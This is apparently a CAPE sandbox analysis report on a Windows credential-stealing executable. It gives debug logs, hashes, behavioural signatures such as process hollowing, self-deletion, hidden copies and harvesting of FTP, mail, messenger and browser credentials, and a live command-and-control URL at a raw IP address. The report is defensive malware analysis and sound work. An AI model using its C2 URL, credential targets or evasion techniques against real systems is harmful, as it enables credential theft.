2020-01-14 13:45:40,937 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-01-14 13:45:40,953 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00000000FF330000) -> AllocationBase 0x00000000FF330000 RegionSize 0x4096.
2020-01-14 13:45:40,969 [root] DEBUG: AddTrackedRegion: EntryPoint 0x13310, Entropy 6.074161e+00
2020-01-14 13:45:40,969 [root] DEBUG: AddTrackedRegion: New region at 0x00000000FF330000 size 0x1000 added to tracked regions.
2020-01-14 13:45:40,984 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:40,984 [root] INFO: Added new process to list with pid: 464
2020-01-14 13:45:40,984 [root] INFO: Monitor successfully loaded in process with pid 464.
2020-01-14 13:45:40,984 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-01-14 13:45:40,984 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-01-14 13:45:40,984 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,029 [root] INFO: Announced 64-bit process name: lsass.exe pid: 568
2020-01-14 13:45:42,029 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:42,029 [lib.api.process] INFO: 64-bit DLL to inject is C:\vtfynxjgxy\dll\ascwMn.dll, loader C:\vtfynxjgxy\bin\IXCtdmJe.exe
2020-01-14 13:45:42,046 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:42,061 [root] DEBUG: Loader: Injecting process 568 (thread 812) with C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,076 [root] DEBUG: Process image base: 0x00000000FF1A0000
2020-01-14 13:45:42,092 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,092 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:42,092 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,092 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 568
2020-01-14 13:45:42,108 [root] INFO: Announced 64-bit process name: lsass.exe pid: 568
2020-01-14 13:45:42,108 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:42,108 [lib.api.process] INFO: 64-bit DLL to inject is C:\vtfynxjgxy\dll\ascwMn.dll, loader C:\vtfynxjgxy\bin\IXCtdmJe.exe
2020-01-14 13:45:42,108 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:42,124 [root] DEBUG: Loader: Injecting process 568 (thread 812) with C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,124 [root] DEBUG: Process image base: 0x00000000FF1A0000
2020-01-14 13:45:42,138 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,154 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-01-14 13:45:42,154 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,154 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 568
2020-01-14 13:45:42,186 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:42,201 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:42,217 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:42,233 [root] WARNING: Unable to place hook on LockResource
2020-01-14 13:45:42,233 [root] WARNING: Unable to hook LockResource
2020-01-14 13:45:42,263 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-01-14 13:45:42,263 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:42,279 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 568 at 0x0000000074DC0000, image base 0x00000000FF1A0000, stack from 0x0000000000104000-0x0000000000110000
2020-01-14 13:45:42,311 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2020-01-14 13:45:42,311 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00000000FF1A0000) returned 0x0000000000000000.
2020-01-14 13:45:42,311 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-01-14 13:45:42,311 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00000000FF1A0000) -> AllocationBase 0x00000000FF1A0000 RegionSize 0x4096.
2020-01-14 13:45:42,325 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1850, Entropy 3.686831e+00
2020-01-14 13:45:42,325 [root] DEBUG: AddTrackedRegion: New region at 0x00000000FF1A0000 size 0x1000 added to tracked regions.
2020-01-14 13:45:42,342 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:42,342 [root] INFO: Added new process to list with pid: 568
2020-01-14 13:45:42,342 [root] INFO: Monitor successfully loaded in process with pid 568.
2020-01-14 13:46:11,249 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1324.
2020-01-14 13:46:12,246 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 464).
2020-01-14 13:46:17,239 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-01-14 13:46:17,239 [root] DEBUG: DLL unloaded from 0x0000000077A00000.
2020-01-14 13:46:17,255 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF330000.
2020-01-14 13:46:17,302 [root] DEBUG: ProcessImageBase: EP 0x0000000000013310 image base 0x00000000FF330000 size 0x0 entropy 6.074399e+00.
2020-01-14 13:46:17,441 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2036.
2020-01-14 13:46:18,346 [root] INFO: Notified of termination of process with pid 568.
2020-01-14 13:46:18,471 [root] DEBUG: Terminate Event: Processing tracked regions before shutdown (process 568).
2020-01-14 13:46:18,924 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-01-14 13:46:22,200 [root] DEBUG: DLL loaded at 0x74D80000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2020-01-14 13:46:22,216 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2020-01-14 13:46:22,216 [root] DEBUG: DLL loaded at 0x74D90000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2020-01-14 13:46:22,230 [root] DEBUG: DLL loaded at 0x74D60000: C:\Windows\system32\netutils (0x9000 bytes).
2020-01-14 13:46:22,230 [root] DEBUG: DLL loaded at 0x74D40000: C:\Windows\system32\srvcli (0x19000 bytes).
2020-01-14 13:46:22,278 [root] DEBUG: DLL loaded at 0x74D20000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2020-01-14 13:46:22,309 [root] DEBUG: DLL loaded at 0x74CE0000: C:\Windows\system32\USERENV (0x17000 bytes).
2020-01-14 13:46:22,355 [root] DEBUG: DLL loaded at 0x75820000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2020-01-14 13:46:22,371 [root] DEBUG: DLL loaded at 0x76C80000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-01-14 13:46:22,403 [root] DEBUG: DLL loaded at 0x75570000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-01-14 13:46:22,403 [root] DEBUG: DLL loaded at 0x75560000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-01-14 13:46:23,183 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:25,085 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-01-14 13:46:25,101 [root] DEBUG: DLL loaded at 0x74D10000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-01-14 13:46:25,974 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:28,627 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:30,171 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1744.
2020-01-14 13:46:30,203 [root] DEBUG: DLL unloaded from 0x77BE0000.
2020-01-14 13:46:40,717 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:42,308 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1400.
2020-01-14 13:46:52,854 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:46:54,444 [root] DEBUG: CreateThread: Initialising breakpoints for thread 744.
2020-01-14 13:47:05,038 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:06,551 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1620.
2020-01-14 13:47:17,236 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:18,891 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1180.
2020-01-14 13:47:30,668 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:32,509 [root] DEBUG: CreateThread: Initialising breakpoints for thread 224.
2020-01-14 13:47:43,180 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:44,865 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1464.
2020-01-14 13:47:55,457 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:47:57,625 [root] DEBUG: CreateThread: Initialising breakpoints for thread 908.
2020-01-14 13:48:08,265 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:09,980 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1048.
2020-01-14 13:48:20,510 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:22,023 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1488.
2020-01-14 13:48:32,724 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:34,161 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1388.
2020-01-14 13:48:45,315 [root] DEBUG: connect hook: Failed to dump region at 0x03554828 around 107.175.150.73.
2020-01-14 13:48:46,858 [root] DEBUG: CreateThread: Initialising breakpoints for thread 888.
2020-01-14 13:48:48,825 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-01-14 13:48:48,825 [root] INFO: Created shutdown mutex.
2020-01-14 13:48:49,854 [lib.api.process] INFO: Terminate event set for process 932
2020-01-14 13:48:49,963 [root] DEBUG: Terminate Event: Processing tracked regions before shutdown (process 932).
2020-01-14 13:48:49,963 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:48:50,026 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:48:50,026 [root] DEBUG: ProcessImageBase: EP 0x000139DE image base 0x00400000 size 0x0 entropy 1.394984e+00.
2020-01-14 13:48:50,088 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1744.
2020-01-14 13:48:50,088 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1400.
2020-01-14 13:48:50,151 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 744.
2020-01-14 13:48:50,151 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1620.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1180.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 224.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1464.
2020-01-14 13:48:50,306 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 908.
2020-01-14 13:48:50,368 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1048.
2020-01-14 13:48:50,368 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1488.
2020-01-14 13:48:50,447 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 1388.
2020-01-14 13:48:50,447 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 888.
2020-01-14 13:48:50,463 [lib.api.process] INFO: Termination confirmed for process 932
2020-01-14 13:48:50,555 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 932
2020-01-14 13:48:50,555 [root] INFO: Terminate event set for process 932.
2020-01-14 13:48:50,555 [root] INFO: Terminating process 932 before shutdown.
2020-01-14 13:48:50,555 [root] INFO: Shutting down package.
2020-01-14 13:48:50,555 [root] INFO: Stopping auxiliary modules.
2020-01-14 13:48:50,555 [root] INFO: Finishing auxiliary modules.
2020-01-14 13:48:50,572 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-01-14 13:48:50,572 [root] WARNING: File at path "C:\FfIKSGRI\debugger" does not exist, skip.
2020-01-14 13:48:50,572 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-04 target-04 ESX 2020-01-14 13:45:21 2020-01-14 13:49:11

File Details

File Name 80c3f9968ecdc33d817040c781e075a19a681cdf.exe
File Size 710656 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ce41fb6da97d5c9fd57d6dd28ccb3d38
SHA1 80c3f9968ecdc33d817040c781e075a19a681cdf
SHA256 8b6a8a1d17b72868327d74827784df0b51617d28876f0c0951d262ba340ed5a4
SHA512 786e34d3ec90dd519e613782f237ce55b718f30ab9b776ecf06e49f67a72acb909466a589e93513225acb25756d100458e7a901343055fd70859fe4c57658829
CRC32 934C8265
Ssdeep 12288:M6w6OiTNMrC2ZT0vuIvQDNDq8JP8R3HGTtspmYzVMYW3w2Pg67sCKIpEINHLOJmT:MiTTMC2V6ADFSm68YV1wU+VNyJK
TrID
  • 35.5% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  • 32.8% (.SCR) Windows screen saver (13101/52/3)
  • 11.2% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 5.1% (.EXE) Win16/32 Executable Delphi generic (2072/23)
  • 5.0% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Dynamic (imported) function loading detected
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultEnumerateVaults
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
Possible date expiration check, exits too soon after checking local time
process: ThGUgOMMWUNV0z.exe, PID 1520
A process attempted to delay the analysis task.
Process: ThGUgOMMWUNV0z.exe tried to sleep 728 seconds, actually delayed analysis time by 0 seconds
CAPE extracted potentially suspicious content
ThGUgOMMWUNV0z.exe: Extracted Shellcode
ThGUgOMMWUNV0z.exe: Extracted Shellcode: 32-bit executable
ThGUgOMMWUNV0z.exe: Extracted Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
http_version_old: HTTP traffic uses version 1.0
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://107.175.150.73/~giftioz/.mojoli/fre.php
Performs some HTTP requests
url: http://107.175.150.73/~giftioz/.mojoli/fre.php
The binary contains an unknown PE section name indicative of packing
unknown section: name: CODE, entropy: 6.60, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0007c400, virtual_size: 0x0007c390
unknown section: name: DATA, entropy: 4.10, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00001400, virtual_size: 0x0000139c
unknown section: name: BSS, entropy: 0.00, characteristics: IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00000c05
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 7.09, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00024c00, virtual_size: 0x00024a24
Behavioural detection: Injection (Process Hollowing)
Injection: ThGUgOMMWUNV0z.exe(1520) -> ThGUgOMMWUNV0z.exe(932)
Executed a process and injected code into it, probably while unpacking
Injection: ThGUgOMMWUNV0z.exe(1520) -> ThGUgOMMWUNV0z.exe(932)
Deletes its original binary from disk
Behavioural detection: Injection (inter-process)
Spoofs its process name and/or associated pathname to appear as a legitimate process
original_path: C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
original_name: ThGUgOMMWUNV0z.exe
modified_name: thgugommwunv0z.exe
modified_path: C:\Users\user\AppData\Local\Temp\thgugommwunv0z.exe
Creates a hidden or system file
file: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
file: C:\Users\user\AppData\Roaming\24CFE6
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
Harvests credentials from local FTP client softwares
file: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
file: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file: C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
file: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
file: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Collects information to fingerprint the system
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Screenshots


Hosts

Direct IP Country Name
Y 107.175.150.73 United States

DNS

No domains contacted.


Summary

C:\Windows\WindowsShell.Manifest
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.ENG
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.ENG.DLL
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.EN
C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.EN.DLL
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\user\AppData\LocalComodo\Dragon\Login Data
C:\Users\user\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\user\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\user\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\user\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\user\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\user\AppData\LocalGoogle\Chrome\Login Data
C:\Users\user\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\user\AppData\LocalNichrome\Login Data
C:\Users\user\AppData\LocalNichrome\Default\Login Data
C:\Users\user\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\user\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\user\AppData\LocalRockMelt\Login Data
C:\Users\user\AppData\LocalRockMelt\Default\Login Data
C:\Users\user\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\user\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\user\AppData\LocalSpark\Login Data
C:\Users\user\AppData\LocalSpark\Default\Login Data
C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\user\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\user\AppData\LocalChromium\Login Data
